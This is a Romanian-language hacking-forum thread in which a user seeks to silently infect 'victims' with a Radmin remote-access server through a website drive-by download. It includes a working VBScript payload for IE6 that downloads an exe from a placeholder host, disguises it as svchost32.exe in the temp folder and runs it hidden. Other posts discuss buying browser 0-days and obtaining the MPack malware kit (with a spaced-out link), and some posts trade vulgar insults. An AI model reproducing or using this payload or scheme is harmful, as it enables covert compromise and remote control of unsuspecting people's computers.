Jump to content
Petzy

E realizabil?

By Petzy, in Programare

Recommended Posts

Petzy Newbie

Petzy

Posted
Posted

Salutari , sunt nou pe forum , imi cer scuze daca am postat la sectiunea gresita mi sa parut cea mai potrivita , vreau sa va imaginati urmatoarele si sa imi ziceti va rog daca se poate face.

Am un fisier denumit de exemplu , test.exe , bun. test.exe este un server radmin ultima vers care odata ce ai dat dublu click pe el (nu iti apare nimic , se instaleaza in background) iti instaleaza pe pc serveru de radmin.Pe scurt eu dau acel fisier la victima , acesta il ruleaza si dupaia eu ma pot conecta la calcu lui prin intermediul ip-ului , ok nici o problema aici.Ce vreau eu sa "perfectionez" este metoda de transmitere acestui fisier catre victima.Spre exemplu m-am gandit serile trecute la urmatoarele : sa zicem ca am un website (free) , urc test.exe intr-un folder pe site , sa zicem */test/ , path-ul fiind */test/test.exe bun , totu ok pana aici , pe pagina principala a site-ului pun un buton atractiv (ceva care sa faca pe victima sa dea click pe acel buton, la asta ma descurc) , butonului ii pun un hiperlink catre fisier , ceva de genu http://www.site.com/test/test.exe , vreau sa stiu daca pot face ca atunci cand victima da click pe butonul respectiv , test.exe sa se RULEZE pe pc-ul sau, deci sa nu fie nevoit sa il downlodeze fisierul si sa dea dublu click pe el , ci sa se rulexe direct prin simplul click dat pe acel buton, se poate? stie cineva vreo metoda? Multumesc anticipat eventualelor raspunsuri.

ps: am observat pe unele site-uri de warez ca atunci cand accesez site-ul (fara sa dau click pe vreun buton) mi se infecteaza pc-u cu spyware / trojan / etc.(spre exemplu de cel putin 10 ori pe 10 site-uri diferite accesam adresa site-ului dupa care circa 30 de secunde pagina parea blocata si parea ca se incarca , dupa care se incarca calumea si cand intram in C:\ pe HD la mine gaseam virusul , fisierele sale.De aici am presupus ca e posibil ceea ce doresc. :unsure:

ps: stiu sigur ca victimele respective folosesc firefox, opera si ie 7.0 laters versions cu update-uri la zi tot tot ... ;) ms anticipat pt rasp

later edit: sau daca e posibil sa nu mai fie nevoie de acel buton ci pur si simplu cand victima intra pe site fisieru sa i se downlodeze pe comp (fara sa vad el asta) si sa se execute singur fisieru (la fel fara sa vada el asta) :)

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted

Pentru doritorii de acel script pt IE6 , mi la dat si mie cineva pe alt forum , nu l-am testat pentru ca nu am avut nevoie pt IE6. 

<script language="VBScript"> 
    on error resume next 
    dl = "http://www.blablasite.com/blabla.exe" 
    Set df = document.createElement("object") 
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 
    str="Microsoft.XMLHTTP" 
    Set x = df.CreateObject(str,"") 
    a1="Ado" 
    a2="db." 
    a3="Str" 
    a4="eam" 
    str1=a1&a2&a3&a4 
    str5=str1 
    set S = df.createobject(str5,"") 
    S.type = 1 
    str6="GET" 
    x.Open str6, dl, False 
    x.Send 
    fname1="svchost32.exe" 
    set F = df.createobject("Scripting.FileSystemObject","") 
    set tmp = F.GetSpecialFolder(2) 
    fname1= F.BuildPath(tmp,fname1) 
    S.open 
    S.write x.responseBody 
    S.savetofile fname1,2 
    S.close 
    set Q = df.createobject("Shell.Application","") 
    Q.ShellExecute fname1,"","","open",0 
    </script>

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted

Ok , am cautat in principal pe google , mpack si am gasit 60 % tutoriale despre nu stiu ce program cu care infectezi mai multe site-uri cu un iframe exploit daca ai user si parola de la ei bla bla , am inteles eu gresit sau ? te rog da`mi mai multe detalii

later edit: ok , cu aproximativ 20 de minute de rabdare m`am prins la ce te referi , prac mpack sunt doua chestii pe net ,

1. "mpack, which is a harmless command-line utility for manipulating MIME-encoded messages."

si

2.In computer security, MPack is a PHP-based malware kit produced by Russian hackers. The first version was released in December 2006. Since then a new version is thought to have been released roughly every month. It is thought to have been used to infect up to 160,000 PCs with keylogging software. In August 2007 it was believed to have been used in an attack on the web site of the Bank of India which originated from the Russian Business Network.

Ok , presupun ca la al doilea te referi , dar e o mica problema , am cautat pe warez / google si sincer nu am gasit nicaieri un download kit. :| ma poti ajuta?

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted

Hai mai chiar nimeni:( cei din staff nu stiti nici o modalitate?

ps: am cautat mpack nu gasesc absolut nicaieri un kit , si sa dau 500 $ - 1000$ nu cred ca mi`ar fi tare profitabil ;) , deci va rog daca stiti alta metoda sa imi spuneti si mie sau daca stiti de unde pot lua mpack sa imi spuneti si mie , mersi anticipat

Link to comment
Share on other sites
Guest Nemessis

Guest Nemessis

Posted
Posted

Genul asta de script este foarte periculos si mai mereu mentinut privat. Nu vei gasi pe nimeni care sa iti dea moka asa ceva. Daca gasesti de unde sa cumperi un 0day perfect functionabil la un browser cunoscut cu 500-1000$ zi ca ti-a pus d-zeu mana in cap si cumpara-l pentru ca vei gasi si tu la randul tau cumparatori si iti vei scoate parleala plus inca ceva banuti pe langa.

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted
Genul asta de script este foarte periculos si mai mereu mentinut privat. Nu vei gasi pe nimeni care sa iti dea moka asa ceva. Daca gasesti de unde sa cumperi un 0day perfect functionabil la un browser cunoscut cu 500-1000$ zi ca ti-a pus d-zeu mana in cap si cumpara-l pentru ca vei gasi si tu la randul tau cumparatori si iti vei scoate parleala plus inca ceva banuti pe langa.

uhm, deci sa inteleg ca inafara de asta nu cunoasti nici o modalitate ?:P

Link to comment
Share on other sites
MadAgent Newbie

MadAgent

Posted
Posted
uhm, deci sa inteleg ca inafara de asta nu cunoasti nici o modalitate ?:P

e o chestie... nu am tot codul... dar pm... din cate am vazut eu... trebuie sa faci fisier *.cab care iti instaleaza automat... descoperisem la un momentdat(anu trecut pe vremea asta cred) si cum sa faci sa-ti intre de pe site... nu era prea greu... dar mi se paruse atunci ca wa... ce am gasit... mai trebuia sa fac ceva... sa fac microsoftu sa creada ca e valabil(adik are permisie de instalare) cabu... am tot citit da n-am gasit nimic... daca tu gasesti cum sa-l faci zi si mie :)

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted
uhm, deci sa inteleg ca inafara de asta nu cunoasti nici o modalitate ?:P

e o chestie... nu am tot codul... dar pm... din cate am vazut eu... trebuie sa faci fisier *.cab care iti instaleaza automat... descoperisem la un momentdat(anu trecut pe vremea asta cred) si cum sa faci sa-ti intre de pe site... nu era prea greu... dar mi se paruse atunci ca wa... ce am gasit... mai trebuia sa fac ceva... sa fac microsoftu sa creada ca e valabil(adik are permisie de instalare) cabu... am tot citit da n-am gasit nimic... daca tu gasesti cum sa-l faci zi si mie :)

i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns :)

Link to comment
Share on other sites
termopanu Newbie

termopanu

Posted
Posted

i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns :)

Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted

i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns :)

Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.

incult si deloc matur, nu cred ca e problema ta semnatura mea sau cum vorbesc, este o comunitate in care trebuie sa fim civilizati , ca sa invatam una alta, daca esti asa de incult incat nu poti face diferenta ...termopanule atunci iti sugerez sa o "razi" in alta parte, consider ca am vorbit destul de frumos in posturile mele precedente si nu am jignit.Rog un moderator sa ia masuri , nu cred ca se permit astfel de specimene aici.

Link to comment
Share on other sites
termopanu Newbie

termopanu

Posted
Posted

i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns :)

Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.

incult si deloc matur, nu cred ca e problema ta semnatura mea sau cum vorbesc, este o comunitate in care trebuie sa fim civilizati , ca sa invatam una alta, daca esti asa de incult incat nu poti face diferenta ...termopanule atunci iti sugerez sa o "razi" in alta parte, consider ca am vorbit destul de frumos in posturile mele precedente si nu am jignit.Rog un moderator sa ia masuri , nu cred ca se permit astfel de specimene aici.

Gascane , ciocu` mic si anusu` largit ! Crezi ca esti la Biserica aici sa zbieri in gura mare ca nu ai de mancare ?

PS : Toti Gascanii din RooTers sunteti niste ratati , unu mai gascan ca altu !

Link to comment
Share on other sites
Petzy Newbie

Petzy

Posted
  • Author
Posted

i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns :)

Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.

incult si deloc matur, nu cred ca e problema ta semnatura mea sau cum vorbesc, este o comunitate in care trebuie sa fim civilizati , ca sa invatam una alta, daca esti asa de incult incat nu poti face diferenta ...termopanule atunci iti sugerez sa o "razi" in alta parte, consider ca am vorbit destul de frumos in posturile mele precedente si nu am jignit.Rog un moderator sa ia masuri , nu cred ca se permit astfel de specimene aici.

Gascane , ciocu` mic si anusu` largit ! Crezi ca esti la Biserica aici sa zbieri in gura mare ca nu ai de mancare ?

PS : Toti Gascanii din RooTers sunteti niste ratati , unu mai gascan ca altu !

Eu am impresia ca esti vreun sarantoc care ai avut de a face cu noi pe vremea cand eram in picioare si ne`am batut putin joc de tine ;) anyway daca asta e cazul inseamna ca neam distrat copios pe seama ta , deci multumim de divertisment , din nou ma repet , cu asa limbaj ai sa ramai un privitor tot timpul.

ps: imi cer scuze moderatorilor pentru off-topicul creat , nu se va mai repeta.

ps2: termopanule , din acesta clipa vei vorbi singur , nu intru in polemicã cu oameni inculti . o seara placuta.

ps3: rog ceilalti daca aveti vrei idee sau sugestie la ce am intrebat in acest topic sa posteze , il voi urmari constant , multumesc

Link to comment
Share on other sites
eLegal Newbie

eLegal

Posted
Posted

Ok , presupun ca la al doilea te referi , dar e o mica problema , am cautat pe warez / google si sincer nu am gasit nicaieri un download kit. :| ma poti ajuta?

Daca cererea ta mai e valabila lasa-mi un prv pt MPack kit

MPack se poate descarca urmand urmatorul link: ht tp: //ww w.nyx.net/~jlea/coders.zip

(am fost nevoit sa pun spatii intre caracterele linkului deoarece nu am inca 3 posturi la activ ca sa pot include linkuri)

Link to comment
Share on other sites
eLegal Newbie

eLegal

Posted
Posted

acolo e o versiune mai veche care ruleaza in dos (arhiva e scanata cu norton av)

Pentru ultima versiune de care stiu o sa postez un link mai tarziu pentru ca inca nu pot posta linkuri si din aceasta cauza imi apar erori..(link cu directionare gresita)

Link to comment
Share on other sites
Argentin Newbie

Argentin

Posted
Posted

Daca exista asa ceva eu te pot ajuta in continuare.

Imi dai butonul pe care l-ai facut si eu ilmodific in FLash si ii dau fucntia

RollOver adica atunci cand numai trece cu pointerul peste buton asta face o actiune.

Este acelasi lucru ca si cand ai da click doar ca in loc sa apesi tu pe buton e nevoie doar de trecere cursorului peste buton.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...